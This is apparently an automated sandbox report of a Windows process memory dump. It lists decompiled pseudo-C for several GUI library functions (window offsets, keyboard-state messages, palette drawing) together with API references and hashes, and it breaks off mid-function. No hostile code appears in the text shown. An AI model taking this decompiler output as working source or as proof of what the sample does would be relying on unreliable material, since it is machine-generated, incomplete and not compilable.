Source File: 00000005.00000002.707244386.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.707234394.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.707402455.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.707411092.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.707417422.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.707426690.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.707439571.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Long$AttributesLayeredRedraw
String ID:
API String ID: 1758778077-0
Opcode ID: 087e273c3aca4a6a58b0e38cb7cb75d1632ce92489a7994197e4ca98f679ba6e
Instruction ID: 7ae8c400807931af7430558d2d8102ea1d42c1aca7f9b541f5a91e1d8d5fe38c
Opcode Fuzzy Hash: 087e273c3aca4a6a58b0e38cb7cb75d1632ce92489a7994197e4ca98f679ba6e
Instruction Fuzzy Hash: 361158A0A0469116DB10AE799C89B97164C1B07319F14157BBC55FF2D3CB6C9848D77C

Uniqueness

Uniqueness Score: -1.00%

Function 004563B8, Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 289
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E004563B8(char __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				struct tagPOINT _v32;
				char _v33;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v48;
				struct HWND__* _v52;
				intOrPtr _v56;
				char _v60;
				struct tagRECT _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				int _v88;
				int _v92;
				intOrPtr _v96;
				char _v100;
				struct tagRECT _v116;
				char _v132;
				intOrPtr _v136;
				char _v140;
				char _v144;
				char _v148;
				struct HWND__* _t135;
				struct HWND__* _t171;
				intOrPtr _t193;
				char _t199;
				intOrPtr _t223;
				intOrPtr _t227;
				intOrPtr* _t262;
				intOrPtr _t281;
				intOrPtr _t282;
				intOrPtr _t284;
				intOrPtr _t290;
				intOrPtr* _t319;
				intOrPtr _t320;
				void* _t327;

				_t326 = _t327;
				_v144 = 0;
				_v148 = 0;
				asm("movsd");
				asm("movsd");
				_v8 = __eax;
				_t281 =  *0x44c43c; // 0x44c440
				E00404D24( &_v100, _t281);
				_t262 =  &_v8;
				_push(_t327);
				_push(0x456763);
				_push( *[fs:eax]);
				 *[fs:eax] = _t327 + 0xffffff70;
				 *((char*)( *_t262 + 0x58)) = 0;
				if( *((char*)( *_t262 + 0x88)) == 0 ||  *((intOrPtr*)( *_t262 + 0x60)) == 0 || E0044C7F4() == 0 || E00453DB8(E00434420( &_v16, 1)) !=  *((intOrPtr*)( *_t262 + 0x60))) {
					L23:
					_t135 = _v52;
					__eflags = _t135;
					if(_t135 <= 0) {
						E004561CC( *_t262);
					} else {
						E00455FD4( *_t262, 0, _t135);
					}
					goto L26;
				} else {
					_v100 =  *((intOrPtr*)( *_t262 + 0x60));
					_v92 = _v16;
					_v88 = _v12;
					_v88 = _v88 + E00456204();
					_v84 = E0045317C();
					_v80 =  *((intOrPtr*)( *_t262 + 0x5c));
					E00435514( *((intOrPtr*)( *_t262 + 0x60)),  &_v132);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t262 + 0x60)))) + 0x40))();
					_v32.x = 0;
					_v32.y = 0;
					_t319 =  *((intOrPtr*)( *((intOrPtr*)( *_t262 + 0x60)) + 0x30));
					_t333 = _t319;
					if(_t319 == 0) {
						_t320 =  *((intOrPtr*)( *_t262 + 0x60));
						_t290 =  *0x431d04; // 0x431d50
						_t171 = E00403768(_t320, _t290);
						__eflags = _t171;
						if(_t171 != 0) {
							__eflags =  *(_t320 + 0x190);
							if( *(_t320 + 0x190) != 0) {
								ClientToScreen( *(_t320 + 0x190),  &_v32);
							}
						}
					} else {
						 *((intOrPtr*)( *_t319 + 0x40))();
					}
					OffsetRect( &_v76, _v32.x - _v24, _v32.y - _v20);
					E004356B8( *((intOrPtr*)( *_t262 + 0x60)),  &_v140,  &_v16);
					_v60 = _v140;
					_v56 = _v136;
					E00453D80( *((intOrPtr*)( *_t262 + 0x60)),  &_v148);
					E00432CA8(_v148,  &_v140,  &_v144, _t333);
					E004043E0( &_v44, _v144);
					_v52 = 0;
					_v48 =  *((intOrPtr*)( *_t262 + 0x74));
					_t193 =  *0x476b44; // 0x432278
					_v96 = _t193;
					_v40 = 0;
					_v33 = E00436D28( *((intOrPtr*)( *_t262 + 0x60)), 0, 0xb030,  &_v100) == 0;
					if(_v33 != 0 &&  *((short*)( *_t262 + 0x11a)) != 0) {
						 *((intOrPtr*)( *_t262 + 0x118))( &_v100);
					}
					if(_v33 == 0 ||  *((intOrPtr*)( *_t262 + 0x60)) == 0) {
						_t199 = 0;
					} else {
						_t199 = 1;
					}
					_t296 =  *_t262;
					 *((char*)( *_t262 + 0x58)) = _t199;
					if( *((char*)( *_t262 + 0x58)) == 0) {
						goto L23;
					} else {
						_t340 = _v44;
						if(_v44 == 0) {
							goto L23;
						}
						E00456358(_v96, _t296, _t326);
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t262 + 0x84)))) + 0x70))();
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t262 + 0x84)))) + 0xd4))( &_v116, _v40);
						OffsetRect( &_v116, _v92, _v88);
						if(E004037D8( *((intOrPtr*)( *_t262 + 0x84)), _t340) != 0) {
							_v116.left = _v116.left - E00420540( *((intOrPtr*)( *((intOrPtr*)( *_t262 + 0x84)) + 0x208)), _v44) + 5;
							_v116.right = _v116.right - E00420540( *((intOrPtr*)( *((intOrPtr*)( *_t262 + 0x84)) + 0x208)), _v44) + 5;
						}
						E0043568C( *((intOrPtr*)( *_t262 + 0x60)),  &_v140,  &_v76);
						_t223 =  *_t262;
						 *((intOrPtr*)(_t223 + 0x64)) = _v140;
						 *((intOrPtr*)(_t223 + 0x68)) = _v136;
						E0043568C( *((intOrPtr*)( *_t262 + 0x60)),  &_v140,  &(_v76.right));
						_t227 =  *_t262;
						 *((intOrPtr*)(_t227 + 0x6c)) = _v140;
						 *((intOrPtr*)(_t227 + 0x70)) = _v136;
						E00435D14( *((intOrPtr*)( *_t262 + 0x84)), _v80);
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t262 + 0x84)))) + 0xd0))(_v40);
						E00453ECC(_v44);
						_t236 = _v52;
						if(_v52 <= 0) {
							E00455FD4( *_t262, 1, _v48);
						} else {
							E00455FD4( *_t262, 0, _t236);
						}
						L26:
						_pop(_t282);
						 *[fs:eax] = _t282;
						_push(0x45676a);
						E0040436C( &_v148, 2);
						_t284 =  *0x44c43c; // 0x44c440
						return E00404DF4( &_v100, _t284);
					}
				}
			}

APIs

Part of subcall function 0044C7F4: GetActiveWindow.USER32 ref: 0044C7F7
Part of subcall function 0044C7F4: GetCurrentThreadId.KERNEL32 ref: 0044C80C
Part of subcall function 0044C7F4: EnumThreadWindows.USER32(00000000,0044C7D4), ref: 0044C812

Part of subcall function 00456204: GetCursor.USER32(?), ref: 0045621F
Part of subcall function 00456204: GetIconInfo.USER32(00000000,?), ref: 00456225

ClientToScreen.USER32(?,?), ref: 004564E4
OffsetRect.USER32(?,?,?), ref: 004564FB
OffsetRect.USER32(?,?,?), ref: 0045662B

Part of subcall function 00455FD4: SetTimer.USER32(00000000,00000000,?,00453DD8), ref: 00455FEE

Strings

x"C, xrefs: 00456561

Memory Dump Source

Source File: 00000005.00000002.707244386.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.707234394.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.707402455.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.707411092.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.707417422.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.707426690.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.707439571.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: OffsetRectThread$ActiveClientCurrentCursorEnumIconInfoScreenTimerWindowWindows
String ID: x"C
API String ID: 2591747986-3989092080
Opcode ID: 585126cc80ca6015a07ca28d9b345bf2d8f416a0fe101d06df0c7b29d0d34172
Instruction ID: fd2f906bf4e1ba9d7d0e8727a3be0329d4ef2a06f7fb95116565e09485ce8d40
Opcode Fuzzy Hash: 585126cc80ca6015a07ca28d9b345bf2d8f416a0fe101d06df0c7b29d0d34172
Instruction Fuzzy Hash: C8D1F575A006188FCB10DFA8C884B9EB7F5BF09304F5581AAE904EB366DB34AD49CF55

Uniqueness

Uniqueness Score: -1.00%

Function 004264A8, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E004264A8(void* __ebx, void* __ecx, void* __edx) {
				intOrPtr _t3;
				intOrPtr _t5;
				intOrPtr _t7;
				intOrPtr _t10;
				intOrPtr _t12;
				intOrPtr _t14;
				intOrPtr _t16;
				intOrPtr _t18;
				void* _t20;
				void* _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				intOrPtr _t35;
				intOrPtr _t38;

				_t27 = __ecx;
				_push(_t38);
				_push(0x426571);
				_push( *[fs:eax]);
				 *[fs:eax] = _t38;
				 *0x492a2c =  *0x492a2c + 1;
				if( *0x492a2c == 0) {
					_t3 =  *0x492a84; // 0x23706d0
					E004035DC(_t3);
					_t5 =  *0x476784; // 0x0
					E004035DC(_t5);
					_t7 =  *0x476780; // 0x0
					E004035DC(_t7);
					E004234DC(__ebx, _t27);
					_t10 =  *0x476788; // 0x23706f4
					E004035DC(_t10);
					_t12 =  *0x492a80; // 0x2370730
					E004035DC(_t12);
					_t14 =  *0x492a74; // 0x2370658
					E004035DC(_t14);
					_t16 =  *0x492a78; // 0x2370680
					E004035DC(_t16);
					_t18 =  *0x492a7c; // 0x23706a8
					E004035DC(_t18);
					_t20 =  *0x492a28; // 0x50080b4e
					DeleteObject(_t20);
					_push(0x492a44);
					L004068A4();
					_push(0x492a5c);
					L004068A4();
					_t34 =  *0x412b34; // 0x412b38
					E00404E28(0x4766a0, 0x12, _t34);
					_t35 =  *0x412b34; // 0x412b38
					E00404E28(0x476518, 0x31, _t35);
				}
				_pop(_t33);
				 *[fs:eax] = _t33;
				_push(0x426578);
				return 0;
			}

APIs

DeleteObject.GDI32(50080B4E), ref: 00426520
RtlDeleteCriticalSection.KERNEL32(00492A44,50080B4E,00000000,00426571), ref: 0042652A
RtlDeleteCriticalSection.KERNEL32(00492A5C,00492A44,50080B4E,00000000,00426571), ref: 00426534

Strings

8+A, xrefs: 00426543, 00426558

Memory Dump Source

Source File: 00000005.00000002.707244386.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.707234394.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.707402455.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.707411092.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.707417422.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.707426690.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.707439571.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Delete$CriticalSection$Object
String ID: 8+A
API String ID: 378701848-2727534933
Opcode ID: f015d21b22477912e6f5e73b3d2f447c5391d7f240376e9a0d997c50e50c4408
Instruction ID: 202c77e7a0c7c83f8ca4daaa98a883a19753f7ddcfdda9886c7b9d40ed037a6c
Opcode Fuzzy Hash: f015d21b22477912e6f5e73b3d2f447c5391d7f240376e9a0d997c50e50c4408
Instruction Fuzzy Hash: A50109723005047FD625BF26EE429193BA9EB44309392443BB408A76B2CABCED52CB5C

Uniqueness

Uniqueness Score: -1.00%

Function 0042C838, Relevance: 6.2, APIs: 4, Instructions: 224
windowCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E0042C838(intOrPtr __eax, void* __ebx, char* __edx, void* __esi) {
				intOrPtr _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				intOrPtr _v52;
				char _v56;
				char _v60;
				long _t97;
				void* _t101;
				intOrPtr _t104;
				void* _t109;
				char _t118;
				long _t135;
				void* _t145;
				intOrPtr _t146;
				char _t148;
				intOrPtr _t152;
				char _t154;
				char _t161;
				void* _t169;
				char _t172;
				char _t174;
				char* _t186;
				void* _t187;
				intOrPtr _t202;
				intOrPtr _t207;
				intOrPtr _t238;
				intOrPtr _t239;

				_t233 = __esi;
				_t238 = _t239;
				_t187 = 7;
				do {
					_push(0);
					_push(0);
					_t187 = _t187 - 1;
				} while (_t187 != 0);
				_push(__ebx);
				_push(__esi);
				_t186 = __edx;
				_v8 = __eax;
				_push(_t238);
				_push(0x42cb2d);
				_push( *[fs:eax]);
				 *[fs:eax] = _t239;
				E0043B224(_v8, __edx);
				if( *((char*)(_v8 + 0x268)) == 0) {
					L30:
					_pop(_t202);
					 *[fs:eax] = _t202;
					_push(0x42cb34);
					E0040436C( &_v60, 4);
					E00404348( &_v44);
					E0040436C( &_v40, 2);
					E0040436C( &_v32, 2);
					return E0040436C( &_v24, 2);
				} else {
					if( *((intOrPtr*)(_v8 + 0x276)) - 2 >= 0) {
						_t97 = GetTickCount();
						_t207 = _v8;
						__eflags = _t97 -  *((intOrPtr*)(_t207 + 0x26c)) - 0x1f4;
						if(_t97 -  *((intOrPtr*)(_t207 + 0x26c)) >= 0x1f4) {
							__eflags = _v8 + 0x270;
							E00404348(_v8 + 0x270);
						}
						 *((intOrPtr*)(_v8 + 0x26c)) = GetTickCount();
					} else {
						E00435B74(_v8,  &_v28);
						E0040439C(_v8 + 0x270, _v28);
					}
					_t101 =  *_t186 - 8;
					if(_t101 == 0) {
						__eflags = E0042C744( &_v12,  &_v16, _t238);
						if(__eflags == 0) {
							_t104 = _v8;
							__eflags =  *((intOrPtr*)(_t104 + 0x276)) - 2;
							if( *((intOrPtr*)(_t104 + 0x276)) - 2 >= 0) {
								L20:
								_t109 = E00404600( *((intOrPtr*)(_v8 + 0x270)));
								__eflags = _v8 + 0x270;
								E00404898(_v8 + 0x270, 1, _t109);
								L21:
								 *_t186 = 0;
								E004037D8(_v8, __eflags);
								goto L30;
							}
							E00435B74(_v8,  &_v32);
							_t118 = E00404600(_v32);
							__eflags = _t118;
							if(_t118 <= 0) {
								goto L20;
							}
							E00435B74(_v8,  &_v24);
							E00404858(_v24, _v12 - 1, 1,  &_v20);
							SendMessageA(E0043C1F4(_v8), 0x14e, 0xffffffff, 0);
							E00404858(_v24, 0x7fffffff, _v16 + 1,  &_v40);
							E0040464C( &_v36, _v40, _v20);
							E00435BA4(_v8, _t186, _v36, _t233);
							_t135 = E00407314();
							SendMessageA(E0043C1F4(_v8), 0x142, 0, _t135);
							E00435B74(_v8,  &_v44);
							E0040439C(_v8 + 0x270, _v44);
							goto L21;
						}
						E0042C770(_t186, _t233, __eflags, _t238);
						goto L21;
					} else {
						_t145 = _t101 - 1;
						if(_t145 == 0) {
							_t146 = _v8;
							__eflags =  *((char*)(_t146 + 0x269));
							if( *((char*)(_t146 + 0x269)) != 0) {
								_t148 = E0042B758(_v8);
								__eflags = _t148;
								if(_t148 != 0) {
									E0042B77C(_v8, 0);
								}
							}
						} else {
							if(_t145 != 0x12) {
								_t152 = _v8;
								__eflags =  *((char*)(_t152 + 0x269));
								if( *((char*)(_t152 + 0x269)) != 0) {
									_t174 = E0042B758(_v8);
									__eflags = _t174;
									if(_t174 == 0) {
										E0042B77C(_v8, 1);
									}
								}
								_t154 = E0042C744( &_v12,  &_v16, _t238);
								__eflags = _t154;
								if(_t154 == 0) {
									E00404528();
									E0040464C( &_v56, _v60,  *((intOrPtr*)(_v8 + 0x270)));
									_t161 = E0042CB3C(_v8, _t186, _v56, _t233);
									__eflags = _t161;
									if(_t161 != 0) {
										 *_t186 = 0;
									}
								} else {
									E00404858( *((intOrPtr*)(_v8 + 0x270)), _v12, 1,  &_v48);
									_push( &_v48);
									E00404528();
									_pop(_t169);
									E00404608(_t169, _v52);
									_t172 = E0042CB3C(_v8, _t186, _v48, _t233);
									__eflags = _t172;
									if(_t172 != 0) {
										 *_t186 = 0;
									}
								}
							}
						}
						goto L30;
					}
				}
			}

APIs

GetTickCount.KERNEL32 ref: 0042C8A0
GetTickCount.KERNEL32 ref: 0042C8C2

Part of subcall function 0042C744: SendMessageA.USER32(00000000,00000140), ref: 0042C760

SendMessageA.USER32(00000000,0000014E,000000FF,00000000), ref: 0042C991
SendMessageA.USER32(00000000,00000142,00000000,00000000), ref: 0042C9E3

Part of subcall function 0042C770: SendMessageA.USER32(00000000,00000140,?,?), ref: 0042C7B1
Part of subcall function 0042C770: SendMessageA.USER32(00000000,0000014E,000000FF,00000000), ref: 0042C7DD
Part of subcall function 0042C770: SendMessageA.USER32(00000000,00000142,00000000,00000000), ref: 0042C811

Part of subcall function 0042B758: SendMessageA.USER32(00000000,00000157,00000000,00000000), ref: 0042B76C

Part of subcall function 0042B77C: SendMessageA.USER32(00000000,0000014F,00000000,00000000), ref: 0042B799
Part of subcall function 0042B77C: InvalidateRect.USER32(00000000,000000FF,000000FF), ref: 0042B7B6

Memory Dump Source

Source File: 00000005.00000002.707244386.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.707234394.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.707402455.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.707411092.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.707417422.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.707426690.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.707439571.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$CountTick$InvalidateRect
String ID:
API String ID: 2080777977-0
Opcode ID: 00514c6290638135f1755ca037d6578518ff3b4938264617d2f35df0aa9d617a
Instruction ID: 11bde4e1897c2e49cbd936de07934a7eb30604cd500c9c0f211fc9ccb53c35b3
Opcode Fuzzy Hash: 00514c6290638135f1755ca037d6578518ff3b4938264617d2f35df0aa9d617a
Instruction Fuzzy Hash: 0B815C70A04158DBCF00EBA9D586BDEB7B5AF85304F6041B6E404BB392CB38AE05DB59

Uniqueness

Uniqueness Score: -1.00%

Function 004586FC, Relevance: 6.2, APIs: 4, Instructions: 163
windowCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E004586FC(intOrPtr __eax, void* __ebx, intOrPtr __edx, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v268;
				char _v508;
				char _v524;
				char _v528;
				char _v532;
				char _v536;
				char _v540;
				char _v544;
				void* _t75;
				intOrPtr _t91;
				char* _t97;
				signed int _t107;
				signed int _t114;
				intOrPtr _t121;
				intOrPtr _t133;
				intOrPtr _t135;
				intOrPtr _t146;
				int _t152;
				intOrPtr _t153;
				void* _t163;
				void* _t164;
				intOrPtr _t165;

				_t163 = _t164;
				_t165 = _t164 + 0xfffffde4;
				_v544 = 0;
				_v540 = 0;
				_v536 = 0;
				_v532 = 0;
				_v528 = 0;
				_t133 = __edx;
				_v8 = __eax;
				_push(_t163);
				_push(0x45895c);
				_push( *[fs:eax]);
				 *[fs:eax] = _t165;
				if(__edx >= 1) {
					E004581C4(_v8,  &_v528);
					if(E0040A9D4(_v528, _t133) == 1) {
						_t133 = _t133 - 1;
					}
				}
				_v12 = _t133;
				if(E004584DC(_v8) == 0) {
					__eflags = _v12;
					if(_v12 < 0) {
						__eflags = 0;
						_v12 = 0;
					}
					E004581C4(_v8,  &_v540);
					_t75 = E00404600(_v540);
					__eflags = _t75 - _v12;
					if(_t75 <= _v12) {
						E004581C4(_v8,  &_v544);
						_v12 = E00404600(_v544);
					}
					E004586D8(_v8, _v12, _v12);
					goto L21;
				} else {
					if(_v12 < 0) {
						_v12 = 0;
					}
					_t135 = _v12 + 1;
					E004581C4(_v8,  &_v532);
					if(_t135 < E00404600(_v532)) {
						E004581C4(_v8,  &_v536);
						asm("bt [edx], eax");
						if(( *(_v536 + _t135 - 1) & 0x000000ff) < 0) {
							_t135 = _t135 + 1;
						}
					}
					_t24 = _v8 + 0x228; // 0x926855c0
					_t91 =  *_t24;
					if(_t91 <= _v12) {
						_v12 = _t91;
						_t135 = _v12;
					}
					E004586D8(_v8, _t135, _t135);
					if(_t135 == _v12) {
						 *((intOrPtr*)(_v8 + 0x230)) = _v12;
						L21:
						__eflags = 0;
						_pop(_t146);
						 *[fs:eax] = _t146;
						_push(0x458963);
						return E0040436C( &_v544, 5);
					} else {
						GetKeyboardState( &_v268);
						_t152 = 0x100;
						_t97 =  &_v524;
						do {
							 *_t97 = 0;
							_t97 = _t97 + 1;
							_t152 = _t152 - 1;
							_t177 = _t152;
						} while (_t152 != 0);
						_v508 = 0x81;
						 *((char*)(_t163 + ( *(0x476c74 + (E004037D8(_v8, _t177) & 0x0000007f) * 2) & 0x0000ffff) - 0x208)) = 0x81;
						SetKeyboardState( &_v524);
						 *((char*)(_v8 + 0x23c)) = 1;
						_push(_t163);
						_push(0x4588ca);
						_push( *[fs:eax]);
						 *[fs:eax] = _t165;
						_t107 = E004037D8(_v8, _t177);
						SendMessageA(E0043C1F4(_v8), 0x100,  *(0x476c74 + (_t107 & 0x0000007f) * 2) & 0x0000ffff, 1);
						_t114 = E004037D8(_v8, _t177);
						SendMessageA(E0043C1F4(_v8), 0x101,  *(0x476c74 + (_t114 & 0x0000007f) * 2) & 0x0000ffff, 1);
						_pop(_t153);
						 *[fs:eax] = _t153;
						_push(0x4588d1);
						_t121 = _v8;
						 *((char*)(_t121 + 0x23c)) = 0;
						return _t121;
					}
				}
			}

APIs

GetKeyboardState.USER32(?,00000000,0045895C), ref: 004587F7
SetKeyboardState.USER32(00000081), ref: 0045883B
SendMessageA.USER32(00000000,00000100,00000000,00000001), ref: 00458880
SendMessageA.USER32(00000000,00000101,00000000,00000001), ref: 004588AD

Memory Dump Source

Source File: 00000005.00000002.707244386.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.707234394.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.707402455.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.707411092.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.707417422.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.707426690.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.707439571.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: KeyboardMessageSendState
String ID:
API String ID: 1999190242-0
Opcode ID: 55297c9ea813afe2186692b7ad6214ec5963d49b08753265d5d2abc067a7a9bb
Instruction ID: bb88850a2d90e2ea23539d4f08a87eb6d4946d203e876879aff1aee77e364116
Opcode Fuzzy Hash: 55297c9ea813afe2186692b7ad6214ec5963d49b08753265d5d2abc067a7a9bb
Instruction Fuzzy Hash: 53615F74A04608AFCB10EF69C885ADDB7F4EB59304F6045EAE844B7392DF386E84DB15

Uniqueness

Uniqueness Score: -1.00%

Function 0042291C, Relevance: 6.1, APIs: 4, Instructions: 64
windowfileCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E0042291C(int __eax, intOrPtr __ecx, void* __edx) {
				struct tagRECT _v32;
				int _t11;
				int _t29;
				void* _t33;
				void* _t35;
				struct HPALETTE__* _t36;
				void* _t38;
				struct HPALETTE__* _t39;

				_t11 = __eax;
				_v32.bottom = __ecx;
				_t33 = __edx;
				_t29 = __eax;
				if( *((intOrPtr*)(__eax + 0x28)) != 0) {
					_t36 =  *((intOrPtr*)( *__eax + 0x24))();
					_t39 = 0;
					if(_t36 != 0) {
						_t39 = SelectPalette(E00420704(__edx), _t36, 0xffffffff);
						RealizePalette(E00420704(_t33));
					}
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t35 = _t33;
					_t38 = _t36;
					_v32.right = _v32.right - 1;
					_v32.bottom = _v32.bottom - 1;
					_t11 = PlayEnhMetaFile(E00420704(_t35),  *( *((intOrPtr*)(_t29 + 0x28)) + 8),  &_v32);
					if(_t38 != 0) {
						return SelectPalette(E00420704(_t35), _t39, 0xffffffff);
					}
				}
				return _t11;
			}

APIs

SelectPalette.GDI32(00000000,00000000,000000FF), ref: 0042294A
RealizePalette.GDI32(00000000), ref: 00422959
PlayEnhMetaFile.GDI32(00000000,?,?), ref: 0042298B
SelectPalette.GDI32(00000000,00000000,000000FF), ref: 0042299F

Memory Dump Source

Source File: 00000005.00000002.707244386.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.707234394.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.707402455.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.707411092.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.707417422.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.707426690.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.707439571.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Palette$Select$FileMetaPlayRealize
String ID:
API String ID: 1995988871-0
Opcode ID: 54b032dc3997382d3c648a3e39e2d6cc26706bd36d5c420c9aafbc1f914f00b0
Instruction ID: f5adf016cef96925e87f4465e5f6b9b27bb554d4f64d10c9ea15436507f7d3d3
Opcode Fuzzy Hash: 54b032dc3997382d3c648a3e39e2d6cc26706bd36d5c420c9aafbc1f914f00b0
Instruction Fuzzy Hash: EE01A5B1708220ABC610AB6D9C8495BB3DDEFC5334F05473AF854E7382D679DC41CA99

Uniqueness

Uniqueness Score: -1.00%

Function 004260B8, Relevance: 6.0, APIs: 4, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004260B8() {
				intOrPtr _v28;
				void* _t4;
				intOrPtr _t8;
				struct HDC__* _t9;
				struct tagTEXTMETRICA* _t10;

				_t8 = 1;
				_t9 = GetDC(0);
				if(_t9 != 0) {
					_t4 =  *0x492a3c; // 0x58a00b4
					if(SelectObject(_t9, _t4) != 0 && GetTextMetricsA(_t9, _t10) != 0) {
						_t8 = _v28;
					}
					ReleaseDC(0, _t9);
				}
				return _t8;
			}

0x004260bd
0x004260c6
0x004260ca
0x004260cc
0x004260da
0x004260e7
0x004260e7
0x004260ee
0x004260ee
0x004260fa

APIs

GetDC.USER32(00000000), ref: 004260C1
SelectObject.GDI32(00000000,058A00B4), ref: 004260D3
GetTextMetricsA.GDI32(00000000), ref: 004260DE
ReleaseDC.USER32 ref: 004260EE

Memory Dump Source

Source File: 00000005.00000002.707244386.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.707234394.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.707402455.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.707411092.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.707417422.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.707426690.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.707439571.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: MetricsObjectReleaseSelectText
String ID:
API String ID: 2013942131-0
Opcode ID: 2eab4d2fe0b0b8f4dbfb164123b17a5649bae200663ea8f27980d139a7f5888b
Instruction ID: 13d47de5f68260cb03a6a485c106516f054eea557b4dd22363026adbf38592c8
Opcode Fuzzy Hash: 2eab4d2fe0b0b8f4dbfb164123b17a5649bae200663ea8f27980d139a7f5888b
Instruction Fuzzy Hash: 71E0482174657027D51171655D42B9B354C4F03764F490136FD44AE3C1DB5EDD10D2FA

Uniqueness

Uniqueness Score: -1.00%

Function 0045E324, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 117
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0045E324(char __eax, void* __ecx, void* __eflags) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v96;
				intOrPtr _v120;
				char _v124;
				intOrPtr _v128;
				char _v132;
				intOrPtr _t36;
				void* _t52;
				int _t60;
				intOrPtr _t81;
				intOrPtr* _t106;
				void* _t107;

				_v8 = __eax;
				_t106 =  &_v8;
				_t36 = E0043C4F8( *_t106);
				if(_t36 != 0) {
					_t36 =  *_t106;
					if( *((char*)(_t36 + 0x254)) != 0) {
						E0045C724( *_t106,  &_v124);
						_v24 =  *((intOrPtr*)( *_t106 + 0x21c)) - 1;
						_v20 =  *((intOrPtr*)( *_t106 + 0x24c)) - 1;
						E0045C95C( &_v124,  &_v24,  &_v132);
						_v24 = _v132;
						_v20 = _v128;
						_t52 =  *((intOrPtr*)( *_t106 + 0x254)) - 1;
						if(_t52 == 0 || _t52 == 2) {
							if( *((intOrPtr*)( *_t106 + 0x21c)) != 1) {
								_t60 = MulDiv( *((intOrPtr*)( *_t106 + 0x258)) -  *((intOrPtr*)( *_t106 + 0x238)), 0x7f, _v24 -  *((intOrPtr*)( *_t106 + 0x238)));
								__eflags = 0;
								E0045E2A4(0, _t60, 0, _t107);
							} else {
								_v12 = E0045F798( *_t106, _v96);
								_v16 = E00435578( *_t106) - _v120;
								_t81 =  *((intOrPtr*)( *_t106 + 0x288));
